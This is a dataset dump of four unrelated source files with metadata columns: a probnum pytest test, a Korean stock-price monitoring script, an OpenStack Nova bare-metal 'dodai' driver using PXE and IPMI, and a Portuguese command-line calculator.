| 24.241379 | 70 | 0.59175 | 97 | 703 | 4.14433 | 0.494845 | 0.074627 | 0.044776 | 0.054726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047431 | 0.280228 | 703 | 28 | 71 | 25.107143 | 0.747036 | 0.02276 | 0 | 0.095238 | 0 | 0 | 0.071533 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.095238 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8e475279de618536216a199ba6321c9d5e431ed | 2,251 | py | Python | tests/test_randprocs/test_markov/test_continuous/test_lti_sde.py | fxbriol/probnum | 7e0e94cf9146aaa2b730b02c6d75a022cd629b5c | [
"MIT"
] | 226 | 2019-11-01T09:44:09.000Z | 2022-03-30T23:17:17.000Z | tests/test_randprocs/test_markov/test_continuous/test_lti_sde.py | fxbriol/probnum | 7e0e94cf9146aaa2b730b02c6d75a022cd629b5c | [
"MIT"
] | 590 | 2019-11-21T08:32:30.000Z | 2022-03-31T12:37:37.000Z | tests/test_randprocs/test_markov/test_continuous/test_lti_sde.py | fxbriol/probnum | 7e0e94cf9146aaa2b730b02c6d75a022cd629b5c | [
"MIT"
] | 39 | 2020-01-13T16:29:45.000Z | 2022-03-28T16:16:54.000Z | import numpy as np
import pytest
from probnum import randprocs, randvars
from tests.test_randprocs.test_markov.test_continuous import test_linear_sde
class TestLTISDE(test_linear_sde.TestLinearSDE):
# Replacement for an __init__ in the pytest language. See:
# https://stackoverflow.com/questions/21430900/py-test-skips-test-class-if-constructor-is-defined
@pytest.fixture(autouse=True)
def _setup(
self,
test_ndim,
spdmat1,
spdmat2,
forw_impl_string_linear_gauss,
backw_impl_string_linear_gauss,
):
self.G_const = spdmat1
self.v_const = np.arange(test_ndim)
self.L_const = spdmat2
self.transition = randprocs.markov.continuous.LTISDE(
drift_matrix=self.G_const,
force_vector=self.v_const,
dispersion_matrix=self.L_const,
forward_implementation=forw_impl_string_linear_gauss,
backward_implementation=backw_impl_string_linear_gauss,
)
self.G = lambda t: self.G_const
self.v = lambda t: self.v_const
self.L = lambda t: self.L_const
self.g = lambda t, x: self.G(t) @ x + self.v(t)
self.dg = lambda t, x: self.G(t)
self.l = lambda t, x: self.L(t)
def test_discretise(self):
out = self.transition.discretise(dt=0.1)
assert isinstance(out, randprocs.markov.discrete.LTIGaussian)
def test_backward_rv(self, some_normal_rv1, some_normal_rv2):
out, _ = self.transition.backward_rv(
some_normal_rv1, some_normal_rv2, t=0.0, dt=0.1
)
assert isinstance(out, randvars.Normal)
def test_backward_realization(self, some_normal_rv1, some_normal_rv2):
out, _ = self.transition.backward_realization(
some_normal_rv1.mean, some_normal_rv2, t=0.0, dt=0.1
)
assert isinstance(out, randvars.Normal)
def test_drift_matrix(self):
np.testing.assert_allclose(self.transition.drift_matrix, self.G_const)
def test_force_vector(self):
np.testing.assert_allclose(self.transition.force_vector, self.v_const)
def test_dispersion_matrix(self):
np.testing.assert_allclose(self.transition.dispersion_matrix, self.L_const)
| 34.106061 | 101 | 0.682808 | 305 | 2,251 | 4.763934 | 0.288525 | 0.027529 | 0.044047 | 0.057811 | 0.465933 | 0.337922 | 0.293875 | 0.222987 | 0.158293 | 0.158293 | 0 | 0.017251 | 0.227454 | 2,251 | 65 | 102 | 34.630769 | 0.818286 | 0.067526 | 0 | 0.040816 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122449 | 1 | 0.142857 | false | 0 | 0.081633 | 0 | 0.244898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8eb2eaba91c179bf94310585ce07cc083077083 | 8,523 | py | Python | stock_db_monitoring.py | devsunset/stock | b963c8fd1126ec5af6cd6b35af8ab20dd7dffbe5 | [
"Apache-2.0"
] | null | null | null | stock_db_monitoring.py | devsunset/stock | b963c8fd1126ec5af6cd6b35af8ab20dd7dffbe5 | [
"Apache-2.0"
] | null | null | null | stock_db_monitoring.py | devsunset/stock | b963c8fd1126ec5af6cd6b35af8ab20dd7dffbe5 | [
"Apache-2.0"
] | null | null | null | ##################################################
#
# stock_db_monitoring program ( version stock_v3 after)
#
##################################################
##################################################
# import
import sqlite3
import unicodedata
import requests
import bs4
from apscheduler.schedulers.blocking import BlockingScheduler
import stock_constant
##################################################
# constant
# 현재 모니터링 테이블 버젼
table_version = 9
# 프로그램 실행 주기
interval_seconds = 30
headers = {"User-Agent": stock_constant.USER_AGENT}
##################################################
# function
# stock current amt crawling
def getStocCurrentAmt(code):
resp = None
if stock_constant.PROXY_USE_FLAG :
resp = requests.get(stock_constant.BASE_URL+stock_constant.CRAWLING_ITEM_URL+code,proxies=stock_constant.PROXY_DICT, headers=headers)
else:
resp = requests.get(stock_constant.BASE_URL+stock_constant.CRAWLING_ITEM_URL+code, headers=headers)
html = resp.text
bs = bs4.BeautifulSoup(html, 'html.parser')
amt = bs.find("em",{"class":"no_up"}).find("span",{"class":"blind"}).get_text()
if amt == None :
amt = bs.find("em",{"class":"no_down"}).find("span",{"class":"blind"}).get_text()
return int(amt.replace(",",""))
# fill space
def fill_str_space(input_s="", max_size=10, fill_char=" "):
l = 0
for c in input_s:
if unicodedata.east_asian_width(c) in ['F', 'W']:
l+=2
else:
l+=1
return input_s+fill_char*(max_size-l)
# db table search
def searchList(sqlText):
columns = []
result = []
conn = sqlite3.connect("stock.db")
with conn:
cur = conn.cursor()
cur.execute(sqlText)
columns = list(map(lambda x: x[0], cur.description))
result = cur.fetchall()
return columns,result
# db table insert/update/delete
def executeDB(sqlText,sqlParam=None):
conn = sqlite3.connect("stock.db")
cur = conn.cursor()
sql = sqlText
if sqlParam == None:
cur.execute(sql)
else:
cur.execute(sql, sqlParam)
conn.commit()
conn.close()
# set stock force sell
def setAllStockSell():
for idx, data in enumerate(CRAWLING_TARGET_FROM_MODULE):
print('---------- table : ',data['idx'],' : ',data['title'],'----------')
table_stock = 'stock_v'+str(table_version)+'_'+str(data['idx'])
sqlText = 'update '+table_stock+' set status = "S" where status = "I"'
executeDB(sqlText)
print('--- force stock all sell ---')
# get current all data
def getLastCurrentAllData():
for idx, data in enumerate(CRAWLING_TARGET_FROM_MODULE):
print('---------- table : ',data['idx'],' : ',data['title'],'----------')
try:
table_stock = 'stock_v'+str(table_version)+'_'+str(data['idx'])+'_meta'
table_stock_meta = 'stock_v'+str(table_version)+'_'+str(data['idx'])
print(searchList("select * from "+table_stock))
print(searchList("select * from "+table_stock_meta+ " where status IN ('I','C','S') order by chg_dttm desc limit 1"))
except Exception as err:
print(err)
# get current amt
def getCurrentAmtData():
stockDataList = []
for idx, dataTarget in enumerate(CRAWLING_TARGET_FROM_MODULE):
# print('---------- table : ',data['idx'],' : ',data['title'],'----------')
try:
table_stock_meta = 'stock_v'+str(table_version)+'_'+str(dataTarget['idx'])+'_meta'
table_stock = 'stock_v'+str(table_version)+'_'+str(dataTarget['idx'])
sqlText = '''select b.status
, b.code
, b.item
, a.current_amt
, b.purchase_amt
, b.sell_amt
, (case b.status
when 'I' then a.current_amt+b.purchase_amt
when 'S' then a.current_amt+b.purchase_amt
else a.current_amt end ) as current_money
, b.purchase_count
from '''+table_stock_meta+''' a
inner join '''+table_stock+''' b
where b.status in ('I','C','S')
order by chg_dttm desc limit 1'''
col, data = searchList(sqlText)
# print(data)
if len(data) == 0:
sqlText = 'select current_amt from '+table_stock_meta
col_sub, data_sub = searchList(sqlText)
# print(data_sub)
stockDataList.append((dataTarget['title'],'매수대기','NONE','NONE',int(data_sub[0][0]),int(data_sub[0][0])))
else:
status = ""
if data[0][0] == "I":
status = "진행중"
# 현재 값 - 수수료 - 세금
now_amt = getStocCurrentAmt(data[0][1])*int(data[0][7])
commission_amt = ((int(data[0][4])*stock_constant.STOCK_COMMISSION_RATE)/100) + (now_amt * stock_constant.STOCK_COMMISSION_RATE) / 100
tax_amt = (now_amt * stock_constant.STOCK_TAX_RATE) / 100
sell_amt = int(now_amt - commission_amt - tax_amt)
stockDataList.append((dataTarget['title'],status,data[0][1],data[0][2],int(data[0][6]),int(data[0][3])+sell_amt))
elif data[0][0] == "S":
status = "매도대기"
# 현재 값 - 수수료 - 세금
now_amt = getStocCurrentAmt(data[0][1])*int(data[0][7])
commission_amt = ((int(data[0][4])*stock_constant.STOCK_COMMISSION_RATE)/100) + (now_amt * stock_constant.STOCK_COMMISSION_RATE) / 100
tax_amt = (now_amt * stock_constant.STOCK_TAX_RATE) / 100
sell_amt = int(now_amt - commission_amt - tax_amt)
stockDataList.append((dataTarget['title'],status,data[0][1],data[0][2],int(data[0][6]),int(data[0][3])+sell_amt))
else:
status = "매도완료"
stockDataList.append((dataTarget['title'],status,data[0][1],data[0][2],int(data[0][6]),int(data[0][6])))
except Exception as err:
print(err)
stockDataList.sort(key = lambda element : element[5],reverse=True)
print('--------------------------------------------------------------------------------------------------------------------------------------------------------------------------')
print(fill_str_space('분류',25),fill_str_space('종목코드',10),fill_str_space('종목명',35),fill_str_space('상태',10),fill_str_space('최초자산',10),fill_str_space('현재자산',10),fill_str_space('이익',10),' --- ', fill_str_space('실시간현재 자산',20),fill_str_space('실시간 이익',10))
print('--------------------------------------------------------------------------------------------------------------------------------------------------------------------------')
for x, stock in enumerate(stockDataList):
print(fill_str_space('['+stock[0]+']',25),fill_str_space(stock[2],10),fill_str_space(stock[3],35),fill_str_space(stock[1],10),fill_str_space(format(stock_constant.CURRENT_AMT,','),10),fill_str_space(format(int(stock[4]),','),10),fill_str_space('['+str(format(int(stock[4]) - stock_constant.CURRENT_AMT,','))+']',10),' --- ',fill_str_space(format(stock[5],','),20),fill_str_space('['+str(format(int(stock[5]) - stock_constant.CURRENT_AMT,','))+']',10))
# main process
def main_process():
# setAllStockSell()
# getLastCurrentAllData()
getCurrentAmtData()
if __name__ == '__main__':
global CRAWLING_TARGET_FROM_MODULE
CRAWLING_TARGET_FROM_MODULE = []
for idx, data in enumerate(stock_constant.CRAWLING_TARGET):
if data['skip'] == False:
CRAWLING_TARGET_FROM_MODULE.append(data)
scheduler = BlockingScheduler()
scheduler.add_job(main_process, 'interval', seconds=interval_seconds)
main_process()
try:
scheduler.start()
except Exception as err:
print(err)
| 44.623037 | 460 | 0.510853 | 932 | 8,523 | 4.454936 | 0.225322 | 0.025289 | 0.054913 | 0.033719 | 0.458815 | 0.429913 | 0.360549 | 0.333574 | 0.317437 | 0.280829 | 0 | 0.020458 | 0.283116 | 8,523 | 190 | 461 | 44.857895 | 0.659083 | 0.055497 | 0 | 0.253731 | 0 | 0 | 0.211957 | 0.052263 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059701 | false | 0 | 0.044776 | 0 | 0.126866 | 0.089552 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8eb7493408bc19d2d91746987af751c90a28ab2 | 23,333 | py | Python | nova/virt/dodai/connection.py | nii-cloud/dodai-compute | d9bea632913c0ddc6f59c6120f60daea369d09cc | [
"Apache-2.0"
] | null | null | null | nova/virt/dodai/connection.py | nii-cloud/dodai-compute | d9bea632913c0ddc6f59c6120f60daea369d09cc | [
"Apache-2.0"
] | null | null | null | nova/virt/dodai/connection.py | nii-cloud/dodai-compute | d9bea632913c0ddc6f59c6120f60daea369d09cc | [
"Apache-2.0"
] | 1 | 2020-05-10T16:36:03.000Z | 2020-05-10T16:36:03.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A dodai hypervisor.
"""
import os
import os.path
import tempfile
import httplib, urllib
from nova import exception
from nova import log as logging
from nova import utils
from nova.compute import power_state
from nova.compute import instance_types
from nova.virt import driver
from nova import db
from nova.virt import images
from nova import flags
from nova.virt.dodai import ofc_utils
from nova.compute import vm_states
from nova.db.sqlalchemy.session import get_session_dodai
from eventlet import greenthread
LOG = logging.getLogger('nova.virt.dodai')
FLAGS = flags.FLAGS
def get_connection(_):
# The read_only parameter is ignored.
return DodaiConnection.instance()
class DodaiConnection(driver.ComputeDriver):
"""Dodai hypervisor driver"""
def __init__(self):
self.host_status = {
'host_name-description': 'Dodai Compute',
'host_hostname': 'dodai-compute',
'host_memory_total': 8000000000,
'host_memory_overhead': 10000000,
'host_memory_free': 7900000000,
'host_memory_free_computed': 7900000000,
'host_other_config': {},
'host_ip_address': '192.168.1.109',
'host_cpu_info': {},
'disk_available': 500000000000,
'disk_total': 600000000000,
'disk_used': 100000000000,
'host_uuid': 'cedb9b39-9388-41df-8891-c5c9a0c0fe5f',
'host_name_label': 'dodai-compute'}
@classmethod
def instance(cls):
if not hasattr(cls, '_instance'):
cls._instance = cls()
return cls._instance
def init_host(self, host):
"""Initialize anything that is necessary for the driver to function,
including catching up with currently running VM's on the given host."""
LOG.debug("init_host")
def get_host_stats(self, refresh=False):
"""Return Host Status of ram, disk, network."""
return self.host_status
def get_info(self, instance_name):
"""Get the current status of an instance, by name (not ID!)
Returns a dict containing:
:state: the running state, one of the power_state codes
:max_mem: (int) the maximum memory in KBytes allowed
:mem: (int) the memory in KBytes used by the domain
:num_cpu: (int) the number of virtual CPUs for the domain
:cpu_time: (int) the CPU time used in nanoseconds
"""
LOG.debug("get_info")
instance_id = self._instance_name_to_id(instance_name)
bmm = db.bmm_get_by_instance_id(None, instance_id)
status = PowerManager(bmm["ipmi_ip"]).status()
if status == "on":
inst_power_state = power_state.RUNNING
else:
inst_power_state = power_state.SHUTOFF
return {'state': inst_power_state,
'max_mem': 0,
'mem': 0,
'num_cpu': 2,
'cpu_time': 0}
def list_instances(self):
"""
Return the names of all the instances known to the virtualization
layer, as a list.
"""
LOG.debug("list_instances")
instance_ids = []
bmms = db.bmm_get_all(None)
for bmm in bmms:
if not bmm["instance_id"]:
continue
instance_ids.append(self._instance_id_to_name(bmm["instance_id"]))
return instance_ids
def list_instances_detail(self, context):
"""Return a list of InstanceInfo for all registered VMs"""
LOG.debug("list_instances_detail")
info_list = []
bmms = db.bmm_get_all_by_instance_id_not_null(context)
for bmm in bmms:
instance = db.instance_get(context, bmm["instance_id"])
status = PowerManager(bmm["ipmi_ip"]).status()
if status == "off":
inst_power_state = power_state.SHUTOFF
if instance["vm_state"] == vm_states.ACTIVE:
db.instance_update(context, instance["id"], {"vm_state": vm_states.STOPPED})
else:
inst_power_state = power_state.RUNNING
if instance["vm_state"] == vm_states.STOPPED:
db.instance_update(context, instance["id"], {"vm_state": vm_states.ACTIVE})
info_list.append(driver.InstanceInfo(self._instance_id_to_name(bmm["instance_id"]),
inst_power_state))
return info_list
def _instance_id_to_name(self, instance_id):
return FLAGS.instance_name_template % instance_id
def _instance_name_to_id(self, instance_name):
return int(instance_name.split("-")[1], 16)
def spawn(self, context, instance,
network_info=None, block_device_info=None):
"""
Create a new instance/VM/domain on the virtualization platform.
Once this successfully completes, the instance should be
running (power_state.RUNNING).
If this fails, any partial instance should be completely
cleaned up, and the virtualization platform should be in the state
that it was before this call began.
:param context: security context
:param instance: Instance object as returned by DB layer.
This function should use the data there to guide
the creation of the new instance.
:param network_info:
:py:meth:`~nova.network.manager.NetworkManager.get_instance_nw_info`
:param block_device_info:
"""
LOG.debug("spawn")
instance_zone, cluster_name, vlan_id, create_cluster = self._parse_zone(instance["availability_zone"])
# update instances table
bmm, reuse = self._select_machine(context, instance)
instance["display_name"] = bmm["name"]
instance["availability_zone"] = instance_zone
db.instance_update(context,
instance["id"],
{"display_name": bmm["name"],
"availability_zone": instance_zone})
if vlan_id:
db.bmm_update(context, bmm["id"], {"availability_zone": cluster_name,
"vlan_id": vlan_id,
"service_ip": None})
if instance_zone == "resource_pool":
self._install_machine(context, instance, bmm, cluster_name, vlan_id)
else:
self._update_ofc(bmm, cluster_name)
if bmm["instance_id"]:
db.instance_destroy(context, bmm["instance_id"])
if reuse:
db.bmm_update(context, bmm["id"], {"status": "used",
"instance_id": instance["id"]})
else:
self._install_machine(context, instance, bmm, cluster_name, vlan_id)
if instance["key_data"]:
self._inject_key(bmm["pxe_ip"], str(instance["key_data"]))
def _inject_key(self, pxe_ip, key_data):
conn = httplib.HTTPConnection(pxe_ip, "4567")
params = urllib.urlencode({"key_data": key_data.strip()})
headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'text/plain'}
conn.request("PUT", "/services/dodai-instance/key.json", params, headers)
response = conn.getresponse()
data = response.read()
LOG.debug(response.status)
LOG.debug(response.reason)
LOG.debug(data)
def _parse_zone(self, zone):
create_cluster = False
vlan_id = None
cluster_name = "resource_pool"
instance_zone = zone
parts = zone.split(",")
if len(parts) >= 2:
if parts[0] == "C":
parts.pop(0)
create_cluster = True
cluster_name, vlan_id = parts
vlan_id = int(vlan_id)
instance_zone = ",".join(parts)
return instance_zone, cluster_name, vlan_id, create_cluster
def _install_machine(self, context, instance, bmm, cluster_name, vlan_id, update_instance=False):
db.bmm_update(context, bmm["id"], {"instance_id": instance["id"]})
mac = self._get_pxe_mac(bmm)
# fetch image
image_base_path = self._get_cobbler_image_path()
if not os.path.exists(image_base_path):
utils.execute('mkdir', '-p', image_base_path)
image_path = self._get_cobbler_image_path(instance)
if not os.path.exists(image_path):
image_meta = images.fetch(context,
instance["image_ref"],
image_path,
instance["user_id"],
instance["project_id"])
else:
image_meta = images.show(context, instance["image_ref"])
image_type = "server"
image_name = image_meta["name"] or image_meta["properties"]["image_location"]
if image_name.find("dodai-deploy") == -1:
image_type = "node"
# begin to install os
pxe_ip = bmm["pxe_ip"] or "None"
pxe_mac = bmm["pxe_mac"] or "None"
storage_ip = bmm["storage_ip"] or "None"
storage_mac = bmm["storage_mac"] or "None"
service_mac1 = bmm["service_mac1"] or "None"
service_mac2 = bmm["service_mac2"] or "None"
instance_path = self._get_cobbler_instance_path(instance)
if not os.path.exists(instance_path):
utils.execute('mkdir', '-p', instance_path)
self._cp_template("create.sh",
self._get_cobbler_instance_path(instance, "create.sh"),
{"INSTANCE_ID": instance["id"],
"IMAGE_ID": instance["image_ref"],
"COBBLER": FLAGS.cobbler,
"HOST_NAME": bmm["name"],
"STORAGE_IP": storage_ip,
"STORAGE_MAC": storage_mac,
"PXE_IP": pxe_ip,
"PXE_MAC": pxe_mac,
"SERVICE_MAC1": bmm["service_mac1"],
"SERVICE_MAC2": bmm["service_mac2"],
"IMAGE_TYPE": image_type,
"MONITOR_PORT": FLAGS.dodai_monitor_port,
"ROOT_SIZE": FLAGS.dodai_partition_root_gb,
"SWAP_SIZE": FLAGS.dodai_partition_swap_gb,
"EPHEMERAL_SIZE": FLAGS.dodai_partition_ephemeral_gb,
"KDUMP_SIZE": FLAGS.dodai_partition_kdump_gb})
self._cp_template("pxeboot_action",
self._get_pxe_boot_file(mac),
{"INSTANCE_ID": instance["id"],
"COBBLER": FLAGS.cobbler,
"PXE_MAC": pxe_mac,
"ACTION": "create"})
LOG.debug("Reboot or power on.")
self._reboot_or_power_on(bmm["ipmi_ip"])
# wait until starting to install os
while self._get_state(context, instance) != "install":
greenthread.sleep(20)
LOG.debug("Wait until begin to install instance %s." % instance["id"])
self._cp_template("pxeboot_start", self._get_pxe_boot_file(mac), {})
# wait until starting to reboot
while self._get_state(context, instance) != "install_reboot":
greenthread.sleep(20)
LOG.debug("Wait until begin to reboot instance %s after os has been installed." % instance["id"])
power_manager = PowerManager(bmm["ipmi_ip"])
power_manager.soft_off()
while power_manager.status() == "on":
greenthread.sleep(20)
LOG.debug("Wait unit the instance %s shuts down." % instance["id"])
power_manager.on()
# wait until installation of os finished
while self._get_state(context, instance) != "installed":
greenthread.sleep(20)
LOG.debug("Wait until instance %s installation finished." % instance["id"])
if cluster_name == "resource_pool":
status = "active"
else:
status = "used"
db.bmm_update(context, bmm["id"], {"status": status})
if update_instance:
db.instance_update(context, instance["id"], {"vm_state": vm_states.ACTIVE})
def _update_ofc(self, bmm, cluster_name):
try:
ofc_utils.update_for_run_instance(FLAGS.ofc_service_url,
cluster_name,
bmm["server_port1"],
bmm["server_port2"],
bmm["dpid1"],
bmm["dpid2"])
except Exception as ex:
LOG.exception(_("OFC exception %s"), unicode(ex))
def _get_state(self, context, instance):
# check if instance exists
instance_ref = db.instance_get(context, instance["id"])
if instance_ref["deleted"]:
raise exception.InstanceNotFound(instance_id=instance["id"])
path = self._get_cobbler_instance_path(instance, "state")
if not os.path.exists(path):
return ""
if not os.path.isfile(path):
return ""
f = open(path)
state = f.read().strip()
f.close()
LOG.debug("State of instance %d: %s" % (instance["id"], state))
return state
def _get_pxe_mac(self, bmm):
return "01-%s" % bmm["pxe_mac"].replace(":", "-").lower()
def _select_machine(self, context, instance):
inst_type = instance_types.get_instance_type(instance['instance_type_id'])
bmm_found = None
reuse = False
# create a non autocommit session
session = get_session_dodai(False)
session.begin()
try:
bmms = db.bmm_get_all_by_instance_type(context, inst_type["name"], session)
if instance["availability_zone"] == "resource_pool": #Add a machine to resource pool.
for bmm in bmms:
if bmm["availability_zone"] != "resource_pool":
continue
if bmm["status"] != "inactive":
continue
bmm_found = bmm
break
else:
for bmm in bmms:
if bmm["availability_zone"] != "resource_pool":
continue
if bmm["status"] != "active":
continue
instance_ref = db.instance_get(context, bmm["instance_id"])
if instance_ref["image_ref"] != instance["image_ref"]:
continue
bmm_found = bmm
reuse = True
break
if not bmm_found:
for bmm in bmms:
if bmm["status"] == "used" or bmm["status"] == "processing":
continue
bmm_found = bmm
reuse = False
break
if bmm_found:
db.bmm_update(context, bmm_found["id"], {"status": "processing"}, session)
except Exception as ex:
LOG.exception(ex)
session.rollback()
raise exception.BareMetalMachineUnavailable()
session.commit()
if bmm_found:
return bmm_found, reuse
raise exception.BareMetalMachineUnavailable()
def _get_cobbler_instance_path(self, instance, file_name = ""):
return os.path.join(FLAGS.cobbler_path,
"instances",
str(instance["id"]),
file_name)
def _get_cobbler_image_path(self, instance = None):
if instance:
return os.path.join(FLAGS.cobbler_path,
"images",
str(instance["image_ref"]))
else:
return os.path.join(FLAGS.cobbler_path,
"images")
def _get_pxe_boot_file(self, mac):
return os.path.join(FLAGS.pxe_boot_path, mac)
def _get_disk_size_mb(self, instance):
inst_type_id = instance['instance_type_id']
inst_type = instance_types.get_instance_type(inst_type_id)
if inst_type["local_gb"] == 0:
return 10 * 1024
return inst_type["local_gb"] * 1024
def _reboot_or_power_on(self, ip):
power_manager = PowerManager(ip)
status = power_manager.status()
LOG.debug("The power is " + status)
if status == "off":
power_manager.on()
else:
power_manager.reboot()
def _cp_template(self, template_name, dest_path, params):
f = open(utils.abspath("virt/dodai/" + template_name + ".template"), "r")
content = f.read()
f.close()
path = os.path.dirname(dest_path)
if not os.path.exists(path):
os.makedirs(path)
for key, value in params.iteritems():
content = content.replace(key, str(value))
f = open(dest_path, "w")
f.write(content)
f.close
def destroy(self, context, instance, network_info, cleanup=True):
"""Destroy (shutdown and delete) the specified instance.
If the instance is not found (for example if networking failed), this
function should still succeed. It's probably a good idea to log a
warning in that case.
:param instance: Instance object as returned by DB layer.
:param network_info:
:py:meth:`~nova.network.manager.NetworkManager.get_instance_nw_info`
:param cleanup:
"""
LOG.debug("destroy")
bmm = db.bmm_get_by_instance_id(context, instance["id"])
db.bmm_update(context, bmm["id"], {"status": "processing"})
mac = self._get_pxe_mac(bmm)
# update ofc
self._update_ofc_for_destroy(context, bmm)
db.bmm_update(context, bmm["id"], {"vlan_id": None,
"availability_zone": "resource_pool"})
# begin to delete os
self._cp_template("delete.sh",
self._get_cobbler_instance_path(instance, "delete.sh"),
{"INSTANCE_ID": instance["id"],
"COBBLER": FLAGS.cobbler,
"MONITOR_PORT": FLAGS.dodai_monitor_port})
self._cp_template("pxeboot_action",
self._get_pxe_boot_file(mac),
{"INSTANCE_ID": instance["id"],
"COBBLER": FLAGS.cobbler,
"PXE_MAC": bmm["pxe_mac"],
"ACTION": "delete"})
self._reboot_or_power_on(bmm["ipmi_ip"])
# wait until starting to delete os
while self._get_state(context, instance) != "deleted":
greenthread.sleep(20)
LOG.debug("Wait until data of instance %s was deleted." % instance["id"])
utils.execute("rm", "-rf", self._get_cobbler_instance_path(instance));
# update db
db.bmm_update(context, bmm["id"], {"instance_id": None,
"service_ip": None})
return db.bmm_get(context, bmm["id"])
def _update_ofc_for_destroy(self, context, bmm):
# update ofc
try:
LOG.debug("vlan_id: " + str(bmm["vlan_id"]))
ofc_utils.update_for_terminate_instance(FLAGS.ofc_service_url,
bmm["availability_zone"],
bmm["server_port1"],
bmm["server_port2"],
bmm["dpid1"],
bmm["dpid2"],
bmm["vlan_id"])
except Exception as ex:
LOG.exception(_("OFC exception %s"), unicode(ex))
def add_to_resource_pool(self, context, instance, bmm):
# begin to install default os
self._install_machine(context, instance, bmm, "resource_pool", None, True)
def stop(self, context, instance):
LOG.debug("stop")
bmm = db.bmm_get_by_instance_id(context, instance["id"])
PowerManager(bmm["ipmi_ip"]).off()
def start(self, context, instance):
LOG.debug("start")
bmm = db.bmm_get_by_instance_id(context, instance["id"])
PowerManager(bmm["ipmi_ip"]).on()
def reboot(self, instance, network_info):
"""Reboot the specified instance.
:param instance: Instance object as returned by DB layer.
:param network_info:
:py:meth:`~nova.network.manager.NetworkManager.get_instance_nw_info`
"""
LOG.debug("reboot")
bmm = db.bmm_get_by_instance_id(None, instance["id"])
PowerManager(bmm["ipmi_ip"]).reboot()
def update_available_resource(self, ctxt, host):
"""Updates compute manager resource info on ComputeNode table.
This method is called when nova-compute launches, and
whenever admin executes "nova-manage service update_resource".
:param ctxt: security context
:param host: hostname that compute manager is currently running
"""
LOG.debug("update_available_resource")
return
def reset_network(self, instance):
"""reset networking for specified instance"""
LOG.debug("reset_network")
return
class PowerManager(object):
def __init__(self, ip):
self.ip = ip
def on(self):
return self._execute("on")
def off(self):
return self._execute("off")
def soft_off(self):
return self._execute("soft")
def reboot(self):
return self._execute("reset")
def status(self):
parts = self._execute("status").split(" ")
return parts[3].strip()
def _execute(self, subcommand):
out, err = utils.execute("/usr/bin/ipmitool", "-I", "lan", "-H", self.ip, "-U", FLAGS.ipmi_username, "-P", FLAGS.ipmi_password, "chassis", "power", subcommand)
return out
| 37.755663 | 167 | 0.563322 | 2,612 | 23,333 | 4.801302 | 0.175727 | 0.040667 | 0.005741 | 0.011482 | 0.335061 | 0.273981 | 0.216011 | 0.154294 | 0.13101 | 0.120644 | 0 | 0.011061 | 0.333562 | 23,333 | 617 | 168 | 37.816856 | 0.795434 | 0.148116 | 0 | 0.249389 | 0 | 0 | 0.131001 | 0.009982 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095355 | false | 0.002445 | 0.041565 | 0.02445 | 0.212714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8ecbf3c365cb4d5599fc420b9e80f3725106ed9 | 1,170 | py | Python | Calculadora1.0.py | Caio-Moretti/Calculadora_1.0 | 26ad132641a224479197a1b503465ec44b339fff | [
"MIT"
] | null | null | null | Calculadora1.0.py | Caio-Moretti/Calculadora_1.0 | 26ad132641a224479197a1b503465ec44b339fff | [
"MIT"
] | null | null | null | Calculadora1.0.py | Caio-Moretti/Calculadora_1.0 | 26ad132641a224479197a1b503465ec44b339fff | [
"MIT"
] | null | null | null | # Calculadora em Python.
# Loop infinito até selecionar uma opção válida.
while True:
titulo = " Python Calculator "
print(titulo.center(50, '='))
print()
print('Selecione o número da operação desejada: ')
print('\n1 - Soma\n'
'2 - Subtração\n'
'3 - Multiplicação\n'
'4 - Divisão\n')
resp = int(input('Digite sua opção (1/2/3/4): ')) # Variável da resposta.
n1 = float(input('Digite o primeiro número: ')) # Variável do primeiro número.
n2 = float(input('Digite o segundo número: ')) # Variável do segundo número.
# Condicionais para as opções.
if resp == 1:
print(f'{n1} + {n2} = {n1 + n2}')
break # Esse break quebra o looping infinito (o usuário selecionou uma opção válida).
elif resp == 2:
print(f'{n1} - {n2} = {n1 - n2}')
break
elif resp == 3:
print(f'{n1} x {n2} = {n1 * n2}')
break
elif resp == 4:
print(f'{n1} ÷ {n2} = {n1 / n2}')
break
# Erro caso o usuário digite a opção errada.
# Mostra o erro e reinicia o loop.
else:
print('[ERRO!] Opção inválida, tente novamente.')
print()
